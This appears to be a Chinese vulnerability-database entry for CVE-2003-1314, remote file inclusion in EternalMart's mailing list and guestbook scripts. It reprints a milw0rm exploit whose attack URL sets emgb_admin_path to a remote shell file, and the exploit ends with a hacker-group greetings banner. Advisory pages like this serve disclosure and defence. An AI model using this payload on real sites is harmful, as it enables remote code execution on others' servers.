EternalMart多个文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111825 漏洞类型 输入验证
发布时间 2006-12-22 更新时间 2006-12-28
CVE编号 CVE-2003-1314 CNNVD-ID CNNVD-200312-160
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2980
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-160
|漏洞详情
EternalMart包含邮件列表管理和客户留言本系统。EternalMart没有正确处理用户提交的请求,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。EternalMart邮件管理程序对用户提交的$emml_path变量缺少充分过滤,可导致远程攻击者提交恶意数据给$emml_path,包含攻击者指定的远程服务器上文件,以WEB权限在系统内执行任意PHP代码。另外EternalMart客户留言系统上对$emgb_admin_path变量也缺少过滤,同样存在上述问题。
|漏洞EXP
******************************************************************************************************
*EternalMart Guestbook 1.1.0********* [emgb_admin_path] ************************* Remote File Include*
******************************************************************************************************
*******************************************
+class : Remote File Include Vulnerability*
*******************************************
+Author : mdx                             *
*****************************************************************************
+Files :
+admin/auth.php?                                                            *
*****************************************************************************
+code  :                                                                    *
+                                                                           *
+      include("$emgb_admin_path/auth_func.php");                           *
+                                                                           *
+      download link :  http://www.vanta.ru/script/info.php?id=230&clas=0   *
*********************************************************************************************
+ Exploit  :                                                                                *
+********************************************************************************************+
+ http://www.site.***/[path]/admin/auth.php?emgb_admin_path=http://mdxshell.txt?  +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
==============================================================================================
?              Hi , The_bat_hacker , How are you ? ;=)                                       *
?                                                                                            *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
?                                                                                            *
?/////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
*******************                                                                          *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..
*******************                                                                          *
*******************                        Turkish Hacker by mdx                             *
*******************                                                                          *
*******************                        Korkmak Kurtulmak Degildir.
*******************                                                                          *
**********************************************************************************************

# milw0rm.com [2006-12-22]
|参考资料

来源:BID
名称:8767
链接:http://www.securityfocus.com/bid/8767
来源:BID
名称:21720
链接:http://www.securityfocus.com/bid/21720
来源:VULNWATCH
名称:20031004EMML,EMGB:Include()hole
链接:http://www.securityfocus.com/archive/1/340244
来源:MILW0RM
名称:2980
链接:http://www.milw0rm.com/exploits/2980
来源:SECTRACK
名称:1007885
链接:http://securitytracker.com/id?1007885
来源:MILW0RM
名称:2980
链接:http://milw0rm.com/exploits/2980
来源:NSFOCUS
名称:5509
链接:http://www.nsfocus.net/vulndb/5509